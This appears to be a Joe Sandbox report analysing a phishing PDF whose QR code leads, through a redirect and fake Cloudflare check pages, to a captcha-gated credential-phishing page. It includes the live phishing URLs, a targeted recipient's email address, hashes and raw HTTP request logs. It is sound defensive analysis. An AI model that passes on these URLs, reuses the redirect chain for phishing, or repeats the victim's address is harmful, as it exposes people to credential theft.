Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Hollandco-File-871871493.pdf

Overview

General Information

Sample name:Hollandco-File-871871493.pdf
Analysis ID:1525816
MD5:3ae6c87a0c97f066b289b50683601a6d
SHA1:6ac8b2da58b4880f853173627bf298bf3cbca382
SHA256:cb1f03050e9343ee3c8bf7a7b57bb37d77c51c7fd2fa3de1c7c0b99c1e9d3b3e
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected landing page (webpage, office document or email)
Found suspicious QR code URL
Phishing site detected (based on shot match)
Detected non-DNS traffic on DNS port
HTML page contains hidden javascript code
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • Acrobat.exe (PID: 2084 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Hollandco-File-871871493.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 7052 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 1540 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2256 --field-trial-handle=1364,i,8592618082487907897,1787593740765580541,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 3936 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dtnyxe.member365.com/ecommunication/api/click/7Lb0GMXJRUy9jjYQJ2oXiQ/l8Qf-Ol5oF6En4qK8pFq1A?r=https%3A%2F%2FHollandco.athrikasih.com%2Fcloudflare-antibot#dwensel+hollandco.com MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1904 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1964,i,1274758649154264039,11806358632527105153,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: QR Code extractorURL: https://dtnyxe.member365.com/ecommunication/api/click/7Lb0GMXJRUy9jjYQJ2oXiQ/l8Qf-Ol5oF6En4qK8pFq1A?r=https%3A%2F%2FHollandco.athrikasih.com%2Fcloudflare-antibot#dwensel+hollandco.com
Source: https://9wetjda.niavereinho.ru/QTnArt4/#Ddwensel@hollandco.comMatcher: Template: captcha matched
Source: https://9wetjda.niavereinho.ru/QTnArt4/#Ddwensel@hollandco.comMatcher: Template: captcha matched
Source: https://hollandco.athrikasih.com/cloudflare-antibot/#dwensel+hollandco.comHTTP Parser: Base64 decoded: {"version":3,"sources":["/cfsetup_build/src/orchestrator/turnstile/templates/turnstile.scss","%3Cinput%20css%20qtFLbZ%3E"],"names":[],"mappings":"AAmCA,gBACI,GACI,uBClCN,CACF,CDqCA,kBACI,GACI,mBCnCN,CACF,CDsCA,iBACI,MAEI,cCrCN,CDwCE,IACI,mBCtCN,CACF,CDyCA...
Source: https://hollandco.athrikasih.com/cloudflare-antibot/#dwensel+hollandco.comHTTP Parser: No favicon
Source: https://hollandco.athrikasih.com/cloudflare-antibot/#dwensel+hollandco.comHTTP Parser: No favicon
Source: https://9wetjda.niavereinho.ru/QTnArt4/#Ddwensel@hollandco.comHTTP Parser: No favicon
Source: https://9wetjda.niavereinho.ru/QTnArt4/#Ddwensel@hollandco.comHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:52664 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.159.75:443 -> 192.168.2.16:52665 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.209.161:443 -> 192.168.2.16:52666 version: TLS 1.2
Source: global trafficTCP traffic: 192.168.2.16:52634 -> 1.1.1.1:53
Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewIP Address: 151.101.66.137 151.101.66.137
Source: Joe Sandbox ViewIP Address: 151.101.66.137 151.101.66.137
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 104.78.188.188
Source: unknownTCP traffic detected without corresponding DNS query: 104.78.188.188
Source: unknownTCP traffic detected without corresponding DNS query: 104.78.188.188
Source: unknownTCP traffic detected without corresponding DNS query: 104.78.188.188
Source: unknownTCP traffic detected without corresponding DNS query: 104.78.188.188
Source: unknownTCP traffic detected without corresponding DNS query: 104.78.188.188
Source: unknownTCP traffic detected without corresponding DNS query: 104.78.188.188
Source: unknownTCP traffic detected without corresponding DNS query: 104.78.188.188
Source: unknownTCP traffic detected without corresponding DNS query: 104.78.188.188
Source: unknownTCP traffic detected without corresponding DNS query: 104.78.188.188
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: global trafficHTTP traffic detected: GET /ecommunication/api/click/7Lb0GMXJRUy9jjYQJ2oXiQ/l8Qf-Ol5oF6En4qK8pFq1A?r=https%3A%2F%2FHollandco.athrikasih.com%2Fcloudflare-antibot HTTP/1.1Host: dtnyxe.member365.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=CuYWk7mCX1vLgvr&MD=ATD2E8nm HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /cloudflare-antibot HTTP/1.1Host: hollandco.athrikasih.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cloudflare-antibot/ HTTP/1.1Host: hollandco.athrikasih.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hollandco.athrikasih.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hollandco.athrikasih.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/x2cq0/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://hollandco.athrikasih.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cd56adf1e4c7ce7&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/x2cq0/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/x2cq0/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cd56adf1e4c7ce7&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: hollandco.athrikasih.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hollandco.athrikasih.com/cloudflare-antibot/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/786006458:1728044719:U-h0t91PTgLDBIoHLkW1c4DQoh4-3OGX1NMhUHSThFI/8cd56adf1e4c7ce7/c6eaeb7329255dd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8cd56adf1e4c7ce7/1728047484358/48e1015a2d24b58034bfdd5402f79a57ea9323b37e0924aa7d29e54bfe487ea4/RoID7XXaQ-k-wPE HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/x2cq0/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8cd56adf1e4c7ce7/1728047484359/cSCIqWMfG6sfcGK HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/x2cq0/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8cd56adf1e4c7ce7/1728047484359/cSCIqWMfG6sfcGK HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/786006458:1728044719:U-h0t91PTgLDBIoHLkW1c4DQoh4-3OGX1NMhUHSThFI/8cd56adf1e4c7ce7/c6eaeb7329255dd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/786006458:1728044719:U-h0t91PTgLDBIoHLkW1c4DQoh4-3OGX1NMhUHSThFI/8cd56adf1e4c7ce7/c6eaeb7329255dd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /QTnArt4/ HTTP/1.1Host: 9wetjda.niavereinho.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://hollandco.athrikasih.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://9wetjda.niavereinho.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://9wetjda.niavereinho.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://9wetjda.niavereinho.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://9wetjda.niavereinho.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jxw27/0x4AAAAAAAicAxRArJzeiy3v/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://9wetjda.niavereinho.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cd56b4bca50423a&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jxw27/0x4AAAAAAAicAxRArJzeiy3v/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
